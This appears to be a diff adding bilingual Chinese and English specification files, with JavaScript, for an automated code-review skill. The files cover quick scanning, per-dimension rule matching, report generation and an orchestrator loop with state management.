- 函数长度和复杂度
|
||||
- 代码重复
|
||||
- 注释质量
|
||||
- 代码组织
|
||||
|
||||
### Performance (性能)
|
||||
- 算法复杂度
|
||||
- 不必要的计算
|
||||
- 内存使用
|
||||
- I/O 效率
|
||||
- 缓存策略
|
||||
|
||||
### Security (安全性)
|
||||
- 注入风险 (SQL, XSS, Command)
|
||||
- 认证和授权
|
||||
- 敏感数据处理
|
||||
- 加密使用
|
||||
- 依赖安全
|
||||
|
||||
### Testing (测试)
|
||||
- 测试覆盖率
|
||||
- 边界条件测试
|
||||
- 错误路径测试
|
||||
- 测试可维护性
|
||||
- Mock 使用
|
||||
|
||||
### Architecture (架构)
|
||||
- 分层结构
|
||||
- 依赖方向
|
||||
- 单一职责
|
||||
- 接口设计
|
||||
- 扩展性
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
/**
 * Deep-review one dimension: apply the dimension's externally configured
 * rules to the highest-priority files and record the resulting findings.
 *
 * @param {object} state - Orchestrator state (reads context, scan_summary,
 *   reviewed_dimensions).
 * @param {string} workDir - Scratch directory; findings are written under
 *   `${workDir}/findings/`.
 * @param {string} currentDimension - Dimension to review (e.g. 'security').
 * @returns {Promise<{stateUpdates: object}>} Updates to merge into state.
 */
async function execute(state, workDir, currentDimension) {
  const context = state.context;
  const dimension = currentDimension;
  const findings = [];

  // Load rule definitions from specs/rules/{dimension}-rules.json.
  const rulesConfig = loadRulesConfig(dimension, workDir);
  const rules = rulesConfig.rules || [];
  const prefix = rulesConfig.prefix || getDimensionPrefix(dimension);

  // Prioritize files flagged as risk areas during the quick scan.
  // Fix: the membership test used Array.includes inside a filter
  // (O(risk_areas × files)); a Set gives O(1) lookups.
  const knownFiles = new Set(context.files);
  const filesToReview = state.scan_summary?.risk_areas
    ?.map(r => r.file)
    ?.filter(f => knownFiles.has(f)) || context.files;

  // Cap the workload: up to 20 risk files + the first 30 context files,
  // deduplicated, 50 files maximum.
  const filesToCheck = [...new Set([
    ...filesToReview.slice(0, 20),
    ...context.files.slice(0, 30)
  ])].slice(0, 50);

  let findingCounter = 1;

  for (const file of filesToCheck) {
    try {
      const content = Read(file);
      const lines = content.split('\n');

      // Apply every rule from the external rule file to this file.
      for (const rule of rules) {
        const matches = detectByPattern(content, lines, file, rule);
        for (const match of matches) {
          findings.push({
            // IDs look like SEC-001, SEC-002, ... (3-digit zero-padded).
            id: `${prefix}-${String(findingCounter++).padStart(3, '0')}`,
            severity: rule.severity || match.severity,
            dimension: dimension,
            category: rule.category,
            file: file,
            line: match.line,
            code_snippet: match.snippet,
            description: rule.description,
            recommendation: rule.recommendation,
            fix_example: rule.fixExample
          });
        }
      }
    } catch (e) {
      // Best-effort: skip unreadable files and keep reviewing the rest.
    }
  }

  // Persist this dimension's findings.
  Write(`${workDir}/findings/${dimension}.json`, JSON.stringify(findings, null, 2));

  return {
    stateUpdates: {
      reviewed_dimensions: [...(state.reviewed_dimensions || []), dimension],
      current_dimension: null,
      // NOTE(review): dotted key — the orchestrator presumably interprets
      // this as a nested-path update into state.findings; confirm there.
      [`findings.${dimension}`]: findings
    }
  };
}
|
||||
|
||||
/**
|
||||
* 从外部 JSON 文件加载规则配置
|
||||
* 规则文件位于 specs/rules/{dimension}-rules.json
|
||||
* @param {string} dimension - 维度名称 (correctness, security, etc.)
|
||||
* @param {string} workDir - 工作目录 (用于日志记录)
|
||||
* @returns {object} 规则配置对象,包含 rules 数组和 prefix
|
||||
*/
|
||||
/**
 * Load the rule configuration for a review dimension from the external
 * JSON file `specs/rules/{dimension}-rules.json` (relative to the skill
 * directory). Falls back to an empty rule set when the file is missing
 * or unparsable, so callers keep working without it.
 *
 * @param {string} dimension - Dimension name (correctness, security, ...).
 * @param {string} workDir - Working directory (kept for interface parity).
 * @returns {object} Rule configuration with `rules` array and `prefix`.
 */
function loadRulesConfig(dimension, workDir) {
  const rulesPath = `specs/rules/${dimension}-rules.json`;

  try {
    return JSON.parse(Read(rulesPath));
  } catch (e) {
    console.warn(`Failed to load rules for ${dimension}: ${e.message}`);
    // Backward-compatible empty config: no rules, default prefix.
    return { rules: [], prefix: getDimensionPrefix(dimension) };
  }
}
|
||||
|
||||
/**
|
||||
* 根据规则的 patternType 检测代码问题
|
||||
* 支持的 patternType: regex, includes
|
||||
* @param {string} content - 文件内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} file - 文件路径
|
||||
* @param {object} rule - 规则配置对象
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
/**
 * Dispatch issue detection according to the rule's patternType.
 * Supported pattern types: 'regex' and 'includes'; any other value
 * (or none) falls back to substring matching.
 *
 * @param {string} content - Full file content.
 * @param {string[]} lines - Content split by line.
 * @param {string} file - File path (unused; kept for interface parity).
 * @param {object} rule - Rule configuration object.
 * @returns {Array} Match result objects.
 */
function detectByPattern(content, lines, file, rule) {
  const { pattern, patternType, negativePatterns, caseInsensitive } = rule;

  // A rule without a pattern can never match anything.
  if (!pattern) return [];

  if (patternType === 'regex') {
    return detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive);
  }

  // 'includes' and every unknown patternType use substring matching.
  return detectByIncludes(content, lines, pattern, negativePatterns);
}
|
||||
|
||||
/**
|
||||
* 使用正则表达式检测代码问题
|
||||
* @param {string} content - 文件完整内容
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 正则表达式模式
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @param {boolean} caseInsensitive - 是否忽略大小写
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
/**
 * Detect code issues by running a regular expression over the whole file
 * content, reporting one match result per regex hit.
 *
 * @param {string} content - Full file content.
 * @param {string[]} lines - Content split by line (used for snippets).
 * @param {string} pattern - Regex source to compile with the 'g' flag.
 * @param {string[]} negativePatterns - Exclusion patterns; a hit whose
 *   line matches any of them is dropped. Entries that are not valid
 *   regexes fall back to substring matching.
 * @param {boolean} caseInsensitive - Add the 'i' flag when true.
 * @returns {Array<{line: number, snippet: string, matchedText: string}>}
 */
function detectByRegex(content, lines, pattern, negativePatterns, caseInsensitive) {
  const matches = [];
  const flags = caseInsensitive ? 'gi' : 'g';

  try {
    const regex = new RegExp(pattern, flags);

    // Pre-compile the negative patterns once (they were previously
    // recompiled for every match). Invalid regexes degrade to a
    // substring check, preserving the original fallback behavior.
    const negMatchers = (negativePatterns || []).map(np => {
      try {
        const re = new RegExp(np);
        return (line) => re.test(line);
      } catch {
        return (line) => line.includes(np);
      }
    });

    let match;
    while ((match = regex.exec(content)) !== null) {
      // Fix: a pattern that can match the empty string (e.g. "x*")
      // never advances lastIndex on a zero-length match, which made
      // this loop spin forever. Skip the empty match and move on.
      if (match[0] === '') {
        regex.lastIndex++;
        continue;
      }

      // Convert the match offset into a 1-based line number.
      const lineNum = content.substring(0, match.index).split('\n').length;
      const lineContent = lines[lineNum - 1] || '';

      // Drop hits whose line matches any exclusion pattern.
      if (negMatchers.some(test => test(lineContent))) continue;

      matches.push({
        line: lineNum,
        snippet: lineContent.trim().substring(0, 100),
        matchedText: match[0]
      });
    }
  } catch (e) {
    // Invalid main pattern: warn and return whatever was collected (none).
    console.warn(`Invalid regex pattern: ${pattern}`);
  }

  return matches;
}
|
||||
|
||||
/**
|
||||
* 使用字符串包含检测代码问题
|
||||
* @param {string} content - 文件完整内容 (未使用但保持接口一致)
|
||||
* @param {string[]} lines - 按行分割的内容
|
||||
* @param {string} pattern - 要查找的字符串
|
||||
* @param {string[]} negativePatterns - 排除模式列表
|
||||
* @returns {Array} 匹配结果数组
|
||||
*/
|
||||
/**
 * Detect code issues by plain substring matching, one result per line
 * that contains the pattern.
 *
 * @param {string} content - Full file content (unused; kept for interface parity).
 * @param {string[]} lines - Content split by line.
 * @param {string} pattern - Substring to look for.
 * @param {string[]} negativePatterns - Exclusion substrings; a line
 *   containing any of them is skipped.
 * @returns {Array<{line: number, snippet: string, matchedText: string}>}
 */
function detectByIncludes(content, lines, pattern, negativePatterns) {
  const hits = [];
  const exclusions = negativePatterns || [];

  for (let i = 0; i < lines.length; i++) {
    const line = lines[i];

    // Guard clauses: no hit, or hit suppressed by an exclusion.
    if (!line.includes(pattern)) continue;
    if (exclusions.some(np => line.includes(np))) continue;

    hits.push({
      line: i + 1,
      snippet: line.trim().substring(0, 100),
      matchedText: pattern
    });
  }

  return hits;
}
|
||||
|
||||
/**
|
||||
* 获取维度前缀(作为规则文件不存在时的备用)
|
||||
* @param {string} dimension - 维度名称
|
||||
* @returns {string} 4字符前缀
|
||||
*/
|
||||
/**
 * Resolve the finding-ID prefix for a dimension (fallback used when the
 * external rule file does not provide one).
 *
 * @param {string} dimension - Dimension name.
 * @returns {string} Four-character prefix; 'MISC' for unknown dimensions.
 */
function getDimensionPrefix(dimension) {
  switch (dimension) {
    case 'correctness': return 'CORR';
    case 'readability': return 'READ';
    case 'performance': return 'PERF';
    case 'security': return 'SEC';
    case 'testing': return 'TEST';
    case 'architecture': return 'ARCH';
    default: return 'MISC';
  }
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
reviewed_dimensions: [...state.reviewed_dimensions, currentDimension],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
...state.findings,
|
||||
[currentDimension]: newFindings
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `findings/{dimension}.json`
|
||||
- **Location**: `${workDir}/findings/`
|
||||
- **Format**: JSON array of Finding objects
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,记录警告 |
|
||||
| 规则执行错误 | 跳过该规则,继续其他规则 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 还有未审查维度: 继续 action-deep-review
|
||||
- 所有维度完成: action-generate-report
|
||||
@@ -0,0 +1,263 @@
|
||||
# Action: Generate Report
|
||||
|
||||
汇总所有发现,生成结构化审查报告。
|
||||
|
||||
## Purpose
|
||||
|
||||
生成最终的代码审查报告:
|
||||
- 汇总所有维度的发现
|
||||
- 按严重程度排序
|
||||
- 提供统计摘要
|
||||
- 输出 Markdown 格式报告
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] 所有维度已审查完成 (reviewed_dimensions.length === 6)
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
/**
 * Aggregate findings from all six dimensions, sort them by severity,
 * compute summary statistics, and write the final Markdown report.
 *
 * @param {object} state - Orchestrator state (reads context, findings,
 *   scan_summary, started_at).
 * @param {string} workDir - Scratch directory; report is written there.
 * @returns {Promise<{stateUpdates: object}>} Report path and summary stats.
 */
async function execute(state, workDir) {
  const context = state.context;
  const findings = state.findings;

  // Dimension order also fixes the flattened-findings order below.
  const dimensionKeys = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];

  // Flatten the per-dimension finding lists into a single array.
  const allFindings = dimensionKeys.flatMap(dim => findings[dim]);

  // Order by severity, most severe first (sort is stable, so findings of
  // equal severity keep their dimension order).
  const severityRank = { critical: 0, high: 1, medium: 2, low: 3, info: 4 };
  allFindings.sort((a, b) => severityRank[a.severity] - severityRank[b.severity]);

  // Summary statistics: totals per severity and per dimension.
  const countSeverity = (level) => allFindings.filter(f => f.severity === level).length;
  const stats = {
    total_issues: allFindings.length,
    critical: countSeverity('critical'),
    high: countSeverity('high'),
    medium: countSeverity('medium'),
    low: countSeverity('low'),
    info: countSeverity('info'),
    by_dimension: Object.fromEntries(dimensionKeys.map(dim => [dim, findings[dim].length]))
  };

  // Render and persist the Markdown report.
  const report = generateMarkdownReport(context, stats, allFindings, state.scan_summary);
  const reportPath = `${workDir}/review-report.md`;
  Write(reportPath, report);

  return {
    stateUpdates: {
      report_generated: true,
      report_path: reportPath,
      summary: {
        ...stats,
        review_duration_ms: Date.now() - new Date(state.started_at).getTime()
      }
    }
  };
}
|
||||
|
||||
/**
 * Render the final review report as a single Markdown document.
 *
 * Sections, in order: overview table, severity/dimension statistics,
 * high-risk area table, per-dimension finding details, and closing
 * recommendations with a generation timestamp.
 *
 * @param {object} context - Review context (reads target_path, file_count,
 *   total_lines, language, framework).
 * @param {object} stats - Aggregate counts: total_issues, per-severity
 *   counts, and a by_dimension count map.
 * @param {Array} findings - All findings (each with dimension, severity,
 *   id, category, file, optional line/code_snippet/fix_example).
 * @param {object} scanSummary - Quick-scan output; scanSummary.risk_areas
 *   feeds the high-risk table (first 10 entries only).
 * @returns {string} Complete Markdown report text.
 */
function generateMarkdownReport(context, stats, findings, scanSummary) {
  // Severity → marker emoji used in per-finding headings.
  const severityEmoji = {
    critical: '🔴',
    high: '🟠',
    medium: '🟡',
    low: '🔵',
    info: '⚪'
  };

  // Header: overview and statistics tables.
  let report = `# Code Review Report

## 审查概览

| 项目 | 值 |
|------|------|
| 目标路径 | \`${context.target_path}\` |
| 文件数量 | ${context.file_count} |
| 代码行数 | ${context.total_lines} |
| 主要语言 | ${context.language} |
| 框架 | ${context.framework || 'N/A'} |

## 问题统计

| 严重程度 | 数量 |
|----------|------|
| 🔴 Critical | ${stats.critical} |
| 🟠 High | ${stats.high} |
| 🟡 Medium | ${stats.medium} |
| 🔵 Low | ${stats.low} |
| ⚪ Info | ${stats.info} |
| **总计** | **${stats.total_issues}** |

### 按维度统计

| 维度 | 问题数 |
|------|--------|
| Correctness (正确性) | ${stats.by_dimension.correctness} |
| Security (安全性) | ${stats.by_dimension.security} |
| Performance (性能) | ${stats.by_dimension.performance} |
| Readability (可读性) | ${stats.by_dimension.readability} |
| Testing (测试) | ${stats.by_dimension.testing} |
| Architecture (架构) | ${stats.by_dimension.architecture} |

---

## 高风险区域

`;

  // High-risk area table from the quick scan (capped at 10 rows).
  if (scanSummary?.risk_areas?.length > 0) {
    report += `| 文件 | 原因 | 优先级 |
|------|------|--------|
`;
    for (const area of scanSummary.risk_areas.slice(0, 10)) {
      report += `| \`${area.file}\` | ${area.reason} | ${area.priority} |\n`;
    }
  } else {
    report += `未发现明显的高风险区域。\n`;
  }

  report += `
---

## 问题详情

`;

  // Group findings by dimension for the details section.
  const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
  const dimensionNames = {
    correctness: '正确性 (Correctness)',
    security: '安全性 (Security)',
    performance: '性能 (Performance)',
    readability: '可读性 (Readability)',
    testing: '测试 (Testing)',
    architecture: '架构 (Architecture)'
  };

  for (const dim of dimensions) {
    const dimFindings = findings.filter(f => f.dimension === dim);
    // Skip the whole section when a dimension has no findings.
    if (dimFindings.length === 0) continue;

    report += `### ${dimensionNames[dim]}

`;

    for (const finding of dimFindings) {
      // One heading per finding; line number appended only when present.
      report += `#### ${severityEmoji[finding.severity]} [${finding.id}] ${finding.category}

- **严重程度**: ${finding.severity.toUpperCase()}
- **文件**: \`${finding.file}\`${finding.line ? `:${finding.line}` : ''}
- **描述**: ${finding.description}
`;

      // Optional offending-code excerpt.
      if (finding.code_snippet) {
        report += `
\`\`\`
${finding.code_snippet}
\`\`\`
`;
      }

      report += `
**建议**: ${finding.recommendation}
`;

      // Optional corrected-code example.
      if (finding.fix_example) {
        report += `
**修复示例**:
\`\`\`
${finding.fix_example}
\`\`\`
`;
      }

      report += `
---

`;
    }
  }

  // Closing recommendations driven by the severity counts.
  report += `
## 审查建议

### 必须修复 (Must Fix)

${stats.critical + stats.high > 0
  ? `发现 ${stats.critical} 个严重问题和 ${stats.high} 个高优先级问题,建议在合并前修复。`
  : '未发现必须立即修复的问题。'}

### 建议改进 (Should Fix)

${stats.medium > 0
  ? `发现 ${stats.medium} 个中等优先级问题,建议在后续迭代中改进。`
  : '代码质量良好,无明显需要改进的地方。'}

### 可选优化 (Nice to Have)

${stats.low + stats.info > 0
  ? `发现 ${stats.low + stats.info} 个低优先级建议,可根据团队规范酌情处理。`
  : '无额外建议。'}

---

*报告生成时间: ${new Date().toISOString()}*
`;

  return report;
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
report_generated: true,
|
||||
report_path: reportPath,
|
||||
summary: {
|
||||
total_issues: totalCount,
|
||||
critical: criticalCount,
|
||||
high: highCount,
|
||||
medium: mediumCount,
|
||||
low: lowCount,
|
||||
info: infoCount,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `review-report.md`
|
||||
- **Location**: `${workDir}/review-report.md`
|
||||
- **Format**: Markdown
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 写入失败 | 尝试备用位置 |
|
||||
| 模板错误 | 使用简化格式 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-complete
|
||||
164
.claude/skills/review-code/phases/actions/action-quick-scan.md
Normal file
@@ -0,0 +1,164 @@
|
||||
# Action: Quick Scan
|
||||
|
||||
快速扫描代码,识别高风险区域。
|
||||
|
||||
## Purpose
|
||||
|
||||
进行第一遍快速扫描:
|
||||
- 识别复杂度高的文件
|
||||
- 标记潜在的高风险区域
|
||||
- 发现明显的问题模式
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.context !== null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
  // Quick-scan pass: walk every file in the collected context, flag
  // high-complexity risk areas and cheap-to-detect issue patterns.
  // Best-effort by design: a file that cannot be read is skipped so one
  // bad file never aborts the whole scan (see Error Handling table below).
  const context = state.context;
  const riskAreas = [];
  const quickIssues = [];

  // 1. Scan each file
  for (const file of context.files) {
    try {
      const content = Read(file);
      const lines = content.split('\n');

      // --- Complexity check ---
      // Rough heuristics only: count function-ish tokens and estimate nesting
      // depth from leading whitespace (assumes 2-space indentation).
      const functionMatches = content.match(/function\s+\w+|=>\s*{|async\s+\w+/g) || [];
      // reduce() instead of Math.max(...spread): spreading one argument per
      // line would overflow the call-argument limit on very large files,
      // and reduce gives a safe base value of 0.
      const nestingDepth = lines.reduce(
        (max, l) => Math.max(max, (l.match(/^\s*/)?.[0].length || 0) / 2),
        0
      );

      if (lines.length > 500 || functionMatches.length > 20 || nestingDepth > 8) {
        riskAreas.push({
          file: file,
          reason: `High complexity: ${lines.length} lines, ${functionMatches.length} functions, depth ${nestingDepth}`,
          priority: 'high'
        });
      }

      // --- Quick issue detection ---

      // Security: eval()/innerHTML are classic injection/XSS vectors.
      if (content.includes('eval(') || content.includes('innerHTML')) {
        quickIssues.push({
          type: 'security',
          file: file,
          message: 'Potential XSS/injection risk: eval() or innerHTML usage'
        });
      }

      // Security: hardcoded credential literals (password/secret/api_key/token).
      if (/(?:password|secret|api_key|token)\s*[=:]\s*['"][^'"]{8,}/i.test(content)) {
        quickIssues.push({
          type: 'security',
          file: file,
          message: 'Potential hardcoded credential detected'
        });
      }

      // Maintenance: excessive TODO/FIXME markers.
      const todoCount = (content.match(/TODO|FIXME|HACK|XXX/gi) || []).length;
      if (todoCount > 5) {
        quickIssues.push({
          type: 'maintenance',
          file: file,
          message: `${todoCount} TODO/FIXME comments found`
        });
      }

      // Readability: leftover console statements in non-test code.
      if (!file.includes('test') && !file.includes('spec')) {
        const consoleCount = (content.match(/console\.(log|debug|info)/g) || []).length;
        if (consoleCount > 3) {
          quickIssues.push({
            type: 'readability',
            file: file,
            message: `${consoleCount} console statements (should be removed in production)`
          });
        }
      }

      // Readability: very long function bodies. NOTE: this regex measures
      // body length in CHARACTERS (>2000) and stops at the first nested '}',
      // so it is a coarse heuristic; the message now states the real unit
      // (it previously claimed ">50 lines").
      const longFunctions = content.match(/function[^{]+\{[^}]{2000,}\}/g) || [];
      if (longFunctions.length > 0) {
        quickIssues.push({
          type: 'readability',
          file: file,
          message: `${longFunctions.length} long function(s) detected (>2000 characters)`
        });
      }

      // Correctness: empty catch blocks silently swallow errors.
      // Fixed: the previous includes('catch (') pre-check required a space
      // before '(' and so missed files containing only `catch(e){}`; the
      // regex alone is both sufficient and more accurate.
      if (/catch\s*\([^)]*\)\s*{\s*}/.test(content)) {
        quickIssues.push({
          type: 'correctness',
          file: file,
          message: 'Empty catch block detected'
        });
      }

    } catch (e) {
      // Skip unreadable files (binary, permission, encoding issues) —
      // deliberate best-effort policy.
    }
  }

  // 2. Compute complexity score (0-100).
  // Guard against division by zero / missing file_count, which previously
  // produced NaN or Infinity for an empty target.
  const fileCount = context.file_count || context.files.length || 1;
  const complexityScore = Math.min(100, Math.round(
    (riskAreas.length * 10 + quickIssues.length * 5) / fileCount * 100
  ));

  // 3. Build scan summary
  const scanSummary = {
    risk_areas: riskAreas,
    complexity_score: complexityScore,
    quick_issues: quickIssues
  };

  // 4. Persist scan result for later phases (report generation reads it).
  Write(`${workDir}/scan-summary.json`, JSON.stringify(scanSummary, null, 2));

  return {
    stateUpdates: {
      scan_completed: true,
      scan_summary: scanSummary
    }
  };
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: riskAreas,
|
||||
complexity_score: score,
|
||||
quick_issues: quickIssues
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `scan-summary.json`
|
||||
- **Location**: `${workDir}/scan-summary.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 文件读取失败 | 跳过该文件,继续扫描 |
|
||||
| 编码问题 | 以二进制跳过 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-deep-review (开始逐维度审查)
|
||||
- 风险区域过多 (>20): 可询问用户是否缩小范围
|
||||
251
.claude/skills/review-code/phases/orchestrator.md
Normal file
@@ -0,0 +1,251 @@
|
||||
# Orchestrator
|
||||
|
||||
根据当前状态选择并执行下一个审查动作。
|
||||
|
||||
## Role
|
||||
|
||||
Code Review 编排器,负责:
|
||||
1. 读取当前审查状态
|
||||
2. 根据状态选择下一个动作
|
||||
3. 执行动作并更新状态
|
||||
4. 循环直到审查完成
|
||||
|
||||
## Dependencies
|
||||
|
||||
- **State Manager**: [state-manager.md](./state-manager.md) - 提供原子化状态操作、自动备份、验证和回滚功能
|
||||
|
||||
## State Management
|
||||
|
||||
本模块使用 StateManager 进行所有状态操作,确保:
|
||||
- **原子更新** - 写入临时文件后重命名,防止损坏
|
||||
- **自动备份** - 每次更新前自动创建备份
|
||||
- **回滚能力** - 失败时可从备份恢复
|
||||
- **结构验证** - 确保状态结构完整性
|
||||
|
||||
### StateManager API (from state-manager.md)
|
||||
|
||||
```javascript
|
||||
// 初始化状态
|
||||
StateManager.initState(workDir)
|
||||
|
||||
// 读取当前状态
|
||||
StateManager.getState(workDir)
|
||||
|
||||
// 更新状态(原子操作,自动备份)
|
||||
StateManager.updateState(workDir, updates)
|
||||
|
||||
// 获取下一个待审查维度
|
||||
StateManager.getNextDimension(state)
|
||||
|
||||
// 标记维度完成
|
||||
StateManager.markDimensionComplete(workDir, dimension)
|
||||
|
||||
// 记录错误
|
||||
StateManager.recordError(workDir, action, message)
|
||||
|
||||
// 从备份恢复
|
||||
StateManager.restoreState(workDir)
|
||||
```
|
||||
|
||||
## Decision Logic
|
||||
|
||||
```javascript
|
||||
/**
 * Decide which action the orchestrator should run next, based solely on the
 * current review state. Returns null when the loop should terminate.
 * @param {object} state - Current review state
 * @returns {string|null} - Action id, or null to stop
 */
function selectNextAction(state) {
  // Terminal states: nothing left to do.
  if (state.status === 'completed' || state.status === 'user_exit') {
    return null;
  }
  // Too many accumulated failures: bail out explicitly.
  if (state.error_count >= 3) {
    return 'action-abort';
  }

  // Not started yet, or context was never collected.
  if (state.status === 'pending' || !state.context) {
    return 'action-collect-context';
  }

  // First pass over the code has not happened yet.
  if (!state.scan_completed) {
    return 'action-quick-scan';
  }

  // Any dimension still unreviewed? Keep deep-reviewing; the concrete
  // dimension is resolved again by the caller and passed to the action.
  if (StateManager.getNextDimension(state)) {
    return 'action-deep-review';
  }

  // All dimensions done: emit the report once, then finish.
  return state.report_generated ? 'action-complete' : 'action-generate-report';
}
|
||||
```
|
||||
|
||||
## Execution Loop
|
||||
|
||||
```javascript
|
||||
/**
 * Main orchestration loop: repeatedly reads state, picks the next action via
 * selectNextAction(), executes it through a sub-agent Task, and applies the
 * returned stateUpdates — until completion or the iteration cap is reached.
 * Relies on the module-scope `workDir` and the StateManager API.
 */
async function runOrchestrator() {
  console.log('=== Code Review Orchestrator Started ===');

  let iteration = 0;
  const MAX_ITERATIONS = 20; // 6 dimensions + overhead

  // Initialize state if it has not been initialized yet.
  let state = StateManager.getState(workDir);
  if (!state) {
    state = StateManager.initState(workDir);
  }

  while (iteration < MAX_ITERATIONS) {
    iteration++;

    // 1. Re-read current state each iteration (via StateManager) so updates
    //    made by the previous action are visible here.
    state = StateManager.getState(workDir);
    if (!state) {
      console.error('[Orchestrator] Failed to read state, attempting recovery...');
      // NOTE(review): StateManager.restoreState throws on failure rather than
      // returning null, so the null-check below may be unreachable — confirm.
      state = StateManager.restoreState(workDir);
      if (!state) {
        console.error('[Orchestrator] Recovery failed, aborting.');
        break;
      }
    }
    console.log(`[Iteration ${iteration}] Status: ${state.status}`);

    // 2. Select the next action; null means the review is finished.
    const actionId = selectNextAction(state);

    if (!actionId) {
      console.log('Review completed, terminating.');
      break;
    }

    console.log(`[Iteration ${iteration}] Executing: ${actionId}`);

    // 3. Record the in-flight action (via StateManager).
    StateManager.updateState(workDir, { current_action: actionId });

    // 4. Execute the action through a sub-agent.
    try {
      const actionPrompt = Read(`phases/actions/${actionId}.md`);

      // Determine the dimension to review this round (via StateManager).
      const currentDimension = StateManager.getNextDimension(state);

      const result = await Task({
        subagent_type: 'universal-executor',
        run_in_background: false,
        prompt: `
[WORK_DIR]
${workDir}

[STATE]
${JSON.stringify(state, null, 2)}

[CURRENT_DIMENSION]
${currentDimension || 'N/A'}

[ACTION]
${actionPrompt}

[SPECS]
Review Dimensions: specs/review-dimensions.md
Issue Classification: specs/issue-classification.md

[RETURN]
Return JSON with stateUpdates field containing updates to apply to state.
`
      });

      // The sub-agent must return JSON; a parse failure lands in the catch.
      const actionResult = JSON.parse(result);

      // 5. Mark the action complete and apply its state updates
      //    (via StateManager).
      StateManager.updateState(workDir, {
        current_action: null,
        completed_actions: [...(state.completed_actions || []), actionId],
        ...actionResult.stateUpdates
      });

      // If this was a deep-review action, mark its dimension as done.
      if (actionId === 'action-deep-review' && currentDimension) {
        StateManager.markDimensionComplete(workDir, currentDimension);
      }

    } catch (error) {
      // Error handling (via StateManager.recordError, which auto-fails the
      // review after 3 recorded errors).
      console.error(`[Orchestrator] Action failed: ${error.message}`);
      StateManager.recordError(workDir, actionId, error.message);

      // Clear the in-flight action marker.
      StateManager.updateState(workDir, { current_action: null });

      // Check whether state recovery is needed.
      const updatedState = StateManager.getState(workDir);
      if (updatedState && updatedState.error_count >= 3) {
        console.error('[Orchestrator] Too many errors, attempting state recovery...');
        StateManager.restoreState(workDir);
      }
    }
  }

  console.log('=== Code Review Orchestrator Finished ===');
}
|
||||
```
|
||||
|
||||
## Action Catalog
|
||||
|
||||
| Action | Purpose | Preconditions |
|
||||
|--------|---------|---------------|
|
||||
| [action-collect-context](actions/action-collect-context.md) | 收集审查目标上下文 | status === 'pending' |
|
||||
| [action-quick-scan](actions/action-quick-scan.md) | 快速扫描识别风险区域 | context !== null |
|
||||
| [action-deep-review](actions/action-deep-review.md) | 深入审查指定维度 | scan_completed === true |
|
||||
| [action-generate-report](actions/action-generate-report.md) | 生成结构化审查报告 | all dimensions reviewed |
|
||||
| [action-complete](actions/action-complete.md) | 完成审查,保存结果 | report_generated === true |
|
||||
|
||||
## Termination Conditions
|
||||
|
||||
- `state.status === 'completed'` - 审查正常完成
|
||||
- `state.status === 'user_exit'` - 用户主动退出
|
||||
- `state.error_count >= 3` - 错误次数超限(由 StateManager.recordError 自动处理)
|
||||
- `iteration >= MAX_ITERATIONS` - 迭代次数超限
|
||||
|
||||
## Error Recovery
|
||||
|
||||
本模块利用 StateManager 提供的错误恢复机制:
|
||||
|
||||
| Error Type | Recovery Strategy | StateManager Function |
|
||||
|------------|-------------------|----------------------|
|
||||
| 状态读取失败 | 从备份恢复 | `restoreState(workDir)` |
|
||||
| 动作执行失败 | 记录错误,累计超限后自动失败 | `recordError(workDir, action, message)` |
|
||||
| 状态不一致 | 验证并恢复 | `getState()` 内置验证 |
|
||||
| 用户中止 | 保存当前进度 | `updateState(workDir, { status: 'user_exit' })` |
|
||||
|
||||
### 错误处理流程
|
||||
|
||||
```
|
||||
1. 动作执行失败
|
||||
|
|
||||
2. StateManager.recordError() 记录错误
|
||||
|
|
||||
3. 检查 error_count
|
||||
|
|
||||
+-- < 3: 继续下一次迭代
|
||||
+-- >= 3: StateManager 自动设置 status='failed'
|
||||
|
|
||||
Orchestrator 检测到 status 变化
|
||||
|
|
||||
尝试 restoreState() 恢复到上一个稳定状态
|
||||
```
|
||||
|
||||
### 状态备份时机
|
||||
|
||||
StateManager 在以下时机自动创建备份:
|
||||
- 每次 `updateState()` 调用前
|
||||
- 可通过 `backupState(workDir, suffix)` 手动创建命名备份
|
||||
|
||||
### 历史追踪
|
||||
|
||||
所有状态变更记录在 `state-history.json`,便于调试和审计:
|
||||
- 初始化事件
|
||||
- 每次更新的字段变更
|
||||
- 恢复操作记录
|
||||
752
